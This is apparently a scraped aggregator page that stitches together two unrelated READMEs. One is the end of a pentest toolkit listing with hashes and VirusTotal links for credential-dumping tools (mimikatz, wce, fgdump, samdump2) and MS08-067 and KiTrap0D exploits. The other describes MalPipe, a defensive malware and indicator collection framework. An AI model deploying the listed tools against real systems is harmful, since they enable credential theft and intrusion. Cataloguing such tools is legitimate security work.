http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html


Other notablelo tools
psexec, smbshell, metasploit’s psexec, etc
https://github.com/BloodHoundAD/BloodHound - It allows to visualize connections in an AD domain and find fast escalation ways.



To Be Added
===========
- http://www.nirsoft.net/ --> Stuff for dumping passwords
- openvpn
- evilgrade



Hashes (SHA256) and VirusTotal scans
===========

8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333  AwesomerShell.tar
7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051  KiTrap0D.tar
96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389  LICENSE.txt
b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e  ncat.exe
da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b  ncat_pes.exe
be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b  nc.exe
56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7  nmap-7.12-setup-gui.exe
0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5  nmap-7.12-win32_commandline.zip
976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654  plink.exe
952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f  srvcheck3.exe
ca5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170  PEScrambler.exe
ef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9  SysinternalsSuite.zip
8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336  windows-privesc-check.exe
6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd  windows-privesc-check.py
ffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9  fgdump.exe
c36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a  kaht2.zip
2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d  mimikatz_2-1.zip
0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a  ms08-067_exploit_31874.py
cc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827  ms08-067_exploit_7132.py
950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e  Responder.tar
54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448  samdump2.exe
ece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8  wce_getlsasrvaddr.exe
c6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7  wce_v1_41beta_universal.exe
ecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6  wce_v1_42beta_x32.exe

5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976  sources/nc110.tgz
47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9  sources/rdp2tcp-0.1.tar.gz
33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78  sources/srvcheck3.zip
f706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56  sources/3proxy-0.8.6.tar.gz
7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc  sources/3proxy-0.9-devel.tgz
dec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81  sources/fgdump-2.1.0.tar.bz2
352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca  sources/impacket_0-9-15.tar
21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4  sources/keimpx-0.3-dev.tar
16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd  sources/mimikatz-2016-06.zip
602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526  sources/samdump2-3.0.0.tar.bz2


ncat.exe
SHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e
https://virustotal.com/en/file/b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e/analysis/1466258994/

ncat_pes.exe
SHA256: da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b 
https://virustotal.com/en/file/da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b/analysis/1466259528/

nc110.tgz
SHA256: 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976
https://virustotal.com/en/file/5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976/analysis/1466258410/

rdp2tcp-0.1.tar.gz
SHA256: 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9
https://virustotal.com/en/file/47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9/analysis/1466271163/


MalPipe - Malware/IOC Ingestion And Processing Engine

April 23, 2018, 5:45 am
$
0
0

MalPipe is a modular malware (and indicator) collection and processing framework. It is designed to pull malware, domains, URLs and IP addresses from multiple feeds, enrich the collected data and export the results.
At this time, the following feeds are supported:

Getting Started
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See deployment for notes on how to deploy the project on a live system.

Installing
Deployment of MalPipe requires installing the required python libraries and configuring the various modules.
Python dependencies can be installed by running:
pip install -r requirements.txt

Configuring

Feeds
An example configuration is provided in config_example.json with settings to get started. This file contains a JSON object containing the required settings for each feed / processor / exporter. An description of a feeds settings are shown below:
...
    "feeds": {
...
        "MalShare": {
            "ENABLED" : true,
            "API_KEY" : "00000000000000000000000000000000000000000000000000000000000",
            "EXPORTERS" :  ["DetailsPrinter", "JSONLog"],
            "PROCESSORS" :  ["YaraScan", "DNSResolver"]
        },

...
As some feeds update daily, feeds can be in two forms: scheduled and active. Settings for when these should run is defined outside of the configuration in the individual modules.

Processors
Processors are used to enrich/standardize the collected. For example, data from VirusTotal contains yara results for each file collected, whereas MalShare does not. By adding, YaraScan to the PROCESSORS key, you can scan the files to also include this data.
An example modules settings are below:
...
    "processors": {
    ...
        "YaraScan": {
            "ENABLED" : false,
            "RULES_PATH": "/yara_rules/Malware.yara"
        },
        ...
Currently, the following processors have been implemented:
  • ASNLookup
  • DNSResolver
  • FileType
  • RDNS
  • YaraScan

Exporters
The final components is exporters, these control where the data goes. These can be used to export collected data to a malware repository, a SIEM, JSON Log files or printed for the user.
     ...
     "exporters": {
        ...
        "JSONLog": {
            "ENABLED" : true,
            "PRETTY" : true,
            "LOG_PATH": "./temp/"
        },
        ...
Currently, the following processors have been implemented:
  • DetailsPrinter
  • GenericWebStorage
  • JSONLog
  • LocalFileStorage

Running
After setup, MalPipe can be run by using:
python malpipe.py

Developing Modules
Modules for MalPipe located under malpipe/ by type:
Creating new modules is easy,

Create Python Module
MalPipe modules are defined as Python classes. Following is an example Module header
class ModuleName(Processor):
    def __init__(self):
        md = ProcessorDescription(
            module_name="ModuleName",
            description="Description",
            authors=["Author Name"],
            version="VersionNumber"
        )
        Processor.__init__(self, md)
        self.types = ['ipaddresses']
        self.parse_settings()
Settings can be set by importing the configuration and set to class variables, shown below:
 from malpipe.config import CONFIG
            ...
            self.yara_rule_path = CONFIG['processors'][self.get_module_name()]['RULES_PATH']
Each processor is required to have a run function that is called by the feed.

Add Settings
After creation of the module, settings need to be added to are config.json under the processors, feeds , or exporters key. If the new module is a processor or exporter, it will also need to be added to the associated feeds. An example is shown below:
     ...
    "processors": {
     ...    
        "SuperNewModule": {
            "ENABLED" : true,
            "DOCOOLSTUFF": true
        },
     ...
    "feeds": {
        ...
        "0DayMalwareFeed": { 
            "ENABLED" : true,
            "EXPORTERS" :  ["DetailsPrinter", "JSONLog"],
            "PROCESSORS" :  ["SuperNewModule"]
        }
        ...

Contributing
Please report any problems by creating a issue or starting a pull request. If you have additional modules or features you would like to see, please consider opening an issue.

Authors
See also the list of contributors who participated in this project.



    Viewing all 5854 articles
    Browse latest View live
    Search
    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>